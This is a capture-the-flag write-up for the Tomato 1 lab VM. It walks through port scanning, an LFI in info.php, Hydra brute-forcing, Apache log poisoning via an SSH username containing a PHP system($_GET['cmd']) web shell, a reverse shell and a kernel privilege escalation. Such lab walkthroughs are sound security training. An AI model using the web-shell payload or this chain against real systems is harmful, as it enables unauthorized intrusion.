Tomato 1: CTF Write-Up

Tomato 1 is another CTF created by SunCSR Team. This CTF is designated as a Medium to Hard box.

Having already gone through it, I would say that this is more on the medium side than the hard side.

The privilege escalation is pretty standard, but the enumeration can be a bit tricky. I tried to load this VM on VirtualBox, but I had problems getting the networking to work. Once I loaded it into VMWare, I instantly got the IP through NetDiscover. Let’s start out with our enumeration and check out this fun box!

Enumeration

I started out with a simple Nmap scan.

user@kali:~/Desktop$ nmap -sV -Pn -A -p- 192.168.1.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020–09–29 15:37 EDT
Nmap scan report for ubuntu.attlocal.net (192.168.1.112)
Host is up (0.00069s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomato
2211/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
| 256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
|_ 256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
8888/tcp open http nginx 1.10.3 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Private Property
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: 401 Authorization Required
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.22 seconds
user@kali:~/Desktop$

We have a couple of ports open. FTP is open as well as two web servers and an SSH service running on a non-standard port. I tried to log into FTP anonymously, but it wasn’t turned on. I went on to the first web server.

I ran a Dirb scan on the webserver and I found the antibot_image directory.

user@kali:~/Desktop$ dirb http://192.168.1.112

— — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -

START_TIME: Tue Sep 29 15:43:21 2020
URL_BASE: http://192.168.1.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

— — — — — — — — -

GENERATED WORDS: 4612

— — Scanning URL: http://192.168.1.112/ — —
==> DIRECTORY: http://192.168.1.112/antibot_image/
+ http://192.168.1.112/index.html (CODE:200|SIZE:652)
+ http://192.168.1.112/server-status (CODE:403|SIZE:278)

— — Entering directory: http://192.168.1.112/antibot_image/ — —
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

— — — — — — — — -
END_TIME: Tue Sep 29 15:43:26 2020
DOWNLOADED: 4612 — FOUND: 2
user@kali:~/Desktop$

Dirb didn’t offer too much more. I browsed to the directory and then clicked on the antibots directory. This gave me a few options.

I checked through some of the php files, but didn’t find anything until I went to info.php. The source code offered a GET request on an image parameter.

I ran my lfi scanner against the parameter to test for an LFI vulnerability.

The lfi scanner found a vulnerability, so I decided to pull the /etc/passwd.

I ran Hydra against the ftp service with the tomato user and the rockyou.txt wordlist, but didn’t get anywhere. Same with the SSH service. So, I decided to see if I could poison the apache logs.

As you can see here, I was able to pull all of the failed attempts from Hydra to login.

Since I was able to pull the logs, I knew that I could poison them. I used PHP code to enter them into the logs via SSH. I used the GET command as the username for SSH and entered a random password in order to ensure the command was in the logs.

user@kali:~/Desktop$ ssh ‘<?php system($_GET[‘cmd’]); ?>’@192.168.1.112 -p 2211
<?php system($_GET[cmd]); ?>@192.168.1.112’s password:
Permission denied, please try again.
<?php system($_GET[cmd]); ?>@192.168.1.112’s password:
Permission denied, please try again.
<?php system($_GET[cmd]); ?>@192.168.1.112’s password:
<?php system($_GET[cmd]); ?>@192.168.1.112: Permission denied (publickey,password).
user@kali:~/Desktop$

After the logs were poisoned, I tested it by trying to run an ls command. As you can see from the screenshot, the server offered the files and the command was run from my internal IP.

Since I had remote command execution, I turned to trying to get a shell. I fired up BurpSuite and turn on the proxy functions of Firefox. I used the cmd function of the url to capture it the GET request.

I intercepted the request.

I entered a reverse shell into the cmd function, but it took a few attempts. I went through most of the reverse shells from the pentestermonkey page and found this one to work. Before I could get a reverse shell, but I needed to encode the shell.

I clicked on the URL-encode all characters option.

I set up a NetCat listener on port 80 and forwarded the GET request. This gave me a reverse shell.

I set up a python server and transferred linpeas.sh over to the target to enumerate for privilege escalation.

The script instantly found the PE vector. The kernel was vulnerable to a local privilege escalation exploit. I went through a few kernel exploits before I arrived at this one.

I followed the compiling directions and transferred it to the target.

Finally, I grabbed the root flag.

This was a really fun box. It gave me a chance to stretch those apache log poisoning muscles that I had not used in quite a while. For more CTFs, follow me here on Medium or on Twitter @assume_breach.